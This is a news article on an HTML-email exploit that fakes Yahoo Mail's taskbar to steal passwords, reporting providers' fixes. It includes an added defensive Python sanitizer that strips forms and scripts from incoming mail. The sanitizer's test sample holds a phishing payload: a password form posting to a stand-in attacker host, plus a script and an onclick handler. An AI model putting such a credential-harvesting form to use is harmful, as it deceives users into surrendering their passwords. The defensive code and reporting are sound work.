
Yahoo, others move to defuse email password-stealing threat

Free email Web sites are scrambling to protect account holders from an exploit that could trick them into handing over their passwords.

Paul Festa Staff Writer, CNET News.com

Yahoo, Excite@Home and USA.net moved today to implement safeguards against the password-stealing exploit, in which a malicious email sender can lead account holders to a bogus but convincing password-entry screen.

"We took a look at it and started immediately to implement something that would make it clearer to users when they are or are not at the Yahoo site," said Lisa Pollock, senior producer for Yahoo Mail. "Our engineers are working on it right now."

The exploit, demonstrated and described by security enthusiast Bennett Haselton, head of anti-filtering organization Peacefire.org, is the latest in a string of password-thieving schemes set up by bug hunters to demonstrate the hazards of HTML messages that can mimic the legitimate password-collection mechanisms of Web-based email sites.

Microsoft's Hotmail, with more than 50 million accounts, has grappled with the problem numerous times, most recently last month.

Because it is presumed to be the Web's largest provider of free email, Hotmail gets pounded the hardest by bug hunters. But thanks to measures implemented in the past to secure the Hotmail service against similar exploits, this latest scheme is ineffective against Hotmail and Mail.com, which licenses its service to Snap.com and other portals.

USA.net and Excite@Home acknowledged that their free email services were vulnerable and said they were in the process of implementing fixes.

Hotmail and its competitors have applied drastic measures to foil password-stealing exploits. These measures have included blocking all use of JavaScript and other scripting languages in incoming HTML messages, and in Hotmail's case, forcing all HTML links to open in a new window framed by a Hotmail warning.

Yahoo does send incoming links to new browser windows. But the password-stealing exploit takes advantage of the fact that Yahoo and the other vulnerable Web emailers do not do the same for HTML forms.

In a demonstration shown to email providers and reporters, Haselton hid the real Yahoo Mail taskbar and created a bogus version at the bottom of an email message. Email recipients clicking "Reply" or "Delete" were presented with a password-entry page telling them their sessions had timed out.
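The countermeasures the article lists (drop scripting from incoming HTML, route links through a warning page in a new window, and close the gap for forms) can be implemented at the point where the webmail service renders a message. The sanitizer below is an added example written for this article, not code from Yahoo, Hotmail or any provider named here; the warning-page URL, the tag lists and the sample message are constructed for illustration.

```python
from html.parser import HTMLParser
from html import escape
from urllib.parse import quote

WARN_URL = "https://mail.example.invalid/warn?url="   # constructed placeholder for the provider's warning page
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "button", "select", "textarea"}
DROP_TAG_ONLY = {"form", "input"}   # the fake-taskbar hole: no forms or fields survive, text inside a form does
VOID = {"br", "img", "hr", "input", "meta", "link", "area", "base", "col"}

class MailSanitizer(HTMLParser):
    """Rewrites an incoming HTML message so it cannot collect credentials in place."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.removed, self.skip_depth = [], [], 0   # removed = audit trail of neutralised tags

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:                       # inside a dropped element: discard everything
            self.skip_depth += tag in DROP_WITH_CONTENT
            return
        if tag in DROP_WITH_CONTENT:
            self.skip_depth, _ = 1, self.removed.append(tag)
            return
        if tag in DROP_TAG_ONLY:
            self.removed.append(tag)
            return
        kept = []
        for name, value in attrs:
            if name.startswith("on") or name in ("formaction", "target"):
                continue                          # no event handlers, no caller-chosen targets
            if tag == "a" and name == "href":     # every link goes through the warning page
                value = WARN_URL + quote(value or "", safe="")
            kept.append((name, value))
        if tag == "a":                            # and opens in a new window, as Hotmail does
            kept += [("target", "_blank"), ("rel", "noopener noreferrer")]
        attr_text = "".join(f' {n}="{escape(v or "", quote=True)}"' for n, v in kept)
        self.out.append(f"<{tag}{attr_text}>")

    def handle_endtag(self, tag):
        if self.skip_depth:
            self.skip_depth -= tag in DROP_WITH_CONTENT
        elif tag not in DROP_TAG_ONLY and tag not in VOID:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data))

def sanitize_message(html):
    """Returns (clean_html, list_of_removed_tags) for one incoming message."""
    p = MailSanitizer()
    p.feed(html)
    p.close()
    return "".join(p.out), p.removed

# Constructed sample: a bogus "taskbar" form plus a scripted link, as in the demonstration.
SAMPLE = ('<p>Hi!</p><script>alert(1)</script>'
          '<form action="http://evil.invalid/login" method="post">'
          '<input type="password" name="pw"><button>Reply</button></form>'
          '<a href="http://example.invalid/x" onclick="steal()">link</a>')
```

Running `sanitize_message(SAMPLE)` leaves only the paragraph and the rewritten link, and the returned audit list tells the service which elements were stripped so it can flag or log the message.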

Yahoo said it would make it clearer to account holders whether they are in the Yahoo Mail site but noted that people still need to exercise caution when handing over their passwords.

"We can't be 100 percent sure that every user will interpret it the way we anticipate," Pollock said.

Pollock recommended that account holders always look at the Web address (URL) of a page asking for a password and that they change passwords regularly.

Yahoo said it patched another Yahoo Mail glitch, this one with its spam-filtering service. The spam filter, implemented late last year, sends unsolicited commercial email to a bulk email folder separate from the in-box.

"We were trying to make some quality improvements Thursday afternoon, and a bug slipped through that let more spam into the in-box," said Matt Lewin, whose title is "technical Yahoo." Lewin said the bug was fixed yesterday.

In other Yahoo Mail news, the site has introduced new customization features that let people determine the color and other "look and feel" elements of their accounts. Those changes can be made under "Preferences," which is found under "Options" on the Yahoo Mail front page.